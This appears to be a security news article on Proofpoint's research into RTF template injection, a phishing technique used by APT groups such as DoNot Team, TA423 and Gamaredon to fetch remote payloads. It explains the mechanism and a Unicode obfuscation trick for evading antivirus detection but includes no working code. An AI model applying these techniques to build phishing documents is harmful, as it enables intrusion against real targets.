Researchers are warning of a new phishing attack technique, where attackers leverage a legitimate template functionality in the Rich Text Format (RTF) file format in order to retrieve malicious payloads from a remote URL.
The attack was observed as early as January, but since then researchers with Proofpoint have observed advanced persistent threat (APT) actors increasingly adopting the phishing tactic in the second and third quarter of 2021. Researchers warn that the simplicity of the attack, which they call RTF template injection, sets it up for further widespread use by less sophisticated cybercriminals.
“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” said researchers with Proofpoint on Wednesday.
The attack stems from the document formatting control word for the “*\template” structure, which is part of RTF's plain text document formatting properties. The first part of this structure's value designates a destination, and the second part designates the specific control word function; Together, these values signify the destination of legitimate template files to be retrieved. However, it is trivial for attackers to alter the bytes of an existing RTF file and insert a template control word destination that includes a URL resource (instead of an accessible file resource destination). In a real-life attack that would allow a remote payload to be fetched when victims open either .rtf files or .doc.rtf files (RTF files that are opened using Microsoft Word).
This tactic is different from how malicious RTF objects have historically been utilized by cybercriminals. Many of these common attacks include overlay data, or additional data appended to the end of RTF files, in order to embed decoy files that execute attacker-controlled code. For instance, in June, an APT was found sending victims phishing emails that contained RTF files embedded with the RoyalRoad weaponizer.
“While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques,” said researchers.
"RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques."
This year, researchers observed three APT actors utilizing RTF template injection. The DoNot Team APT group, which has been suspected of being aligned with Indian state interests, was observed leveraging the technique between February and July. The APT’s emails used “defense proposal” lures and appeared to target entities in Pakistan and Sri Lanka. In this attack, the threat group included the template formatting property within a preexisting list override table in the RTF file, which governs the formatting of various document features (such as headers or footers). Specifically, the malicious template control word is embedded in the “wgrffmtfilters” font family control word, said researchers. The APT also utilized a Unicode signed character notation in order to obfuscate the URL value of the RTF file, which researchers believe is a way to evade static detection signatures in antivirus software.
“The ability of RTF files to parse these signed 16-bit Unicode characters provides actors an alternative to using plaintext strings containing a URL, which allows for easy analysis of malicious samples upon detection,” said researchers.
Between April and September, researchers observed TA423, a China-related APT actor, send phishing emails that targeted the Malaysian deep water energy exploration sector and contained RTF files as attachments. These RTF files included remote template injection URLs in plaintext, which referenced external content in plain sight in the strings of the attachments.
“Of note is that this threat actor also weaponized the RTF files by using a different section of the document formatting properties than was previously observed among the DoNot Team campaigns,” said researchers. “This actor chose to modify a preexisting enclosing group with a font family control word rather than the wgrffmtfilters group previously discussed.”
Most recently, on Oct. 5 the Gamaredon APT actor was observed leveraging the tactic in emails that utilized Ukrainian governmental file lures. The APT, linked to the Russian government, utilized RTF template injection documents that communicated with an external domain. In this attack, Microsoft Office documents used the remote template infection tactic to retrieve the malicious payloads, and in some cases used an MP3 file as a delivery resource. Gamaredon also used this tactic alongside several other attachment delivery methods - including Office and XML template documents - that all shared a single URL, leading researchers to believe the APT is experimenting with new file types.
Researchers said that this new phishing method is an expanding threat surface for organizations globally, and they expect it to be utilized by less sophisticated threat actors in addition to APTs.
“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” said researchers.